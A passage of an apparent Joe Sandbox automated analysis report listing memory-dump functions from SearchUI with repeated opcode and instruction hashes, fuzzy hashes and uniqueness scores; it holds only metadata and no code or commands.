                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602C18, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600418, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601418, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600C20, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602C28, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600C28, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601430, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601CF8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602CF8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601D00, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602D00, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600508, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600510, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601510, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602D10, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602CE0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602CE8, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602CC0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602CD0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601C98, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602CA0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602CB0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600578, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602D78, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602D80, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602D90, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601D68, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602D68, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601D70, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
